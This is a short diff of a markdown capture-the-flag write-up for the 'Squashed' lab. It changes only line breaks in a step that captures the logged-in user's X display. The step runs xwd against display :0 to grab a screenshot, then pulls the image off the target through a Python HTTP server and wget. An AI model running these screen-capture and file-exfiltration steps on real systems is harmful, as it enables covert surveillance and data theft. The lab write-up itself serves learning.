AdamRose1/Hacking_CTF_Labs_Writeups/Squashed.md

 The output from the ‘w’ command shows in the ‘FROM’ column that the display used is ‘:0’ .

 We are ready to run ‘xwd’.
-Use command: xwd -root -screen -silent -dsiplay :0 > /tmp/screen.xwd Download /tmp/screen.xwd to our local system.
+Use command: xwd -root -screen -silent -dsiplay :0 > /tmp/screen.xwd <br>
+Download /tmp/screen.xwd to our local system.
 To do this we will open a python server on the target shell using command: python3 -m http.server 8000.  <br>
 On our local system, use command: wget http://10.10.11.191/screen.xwd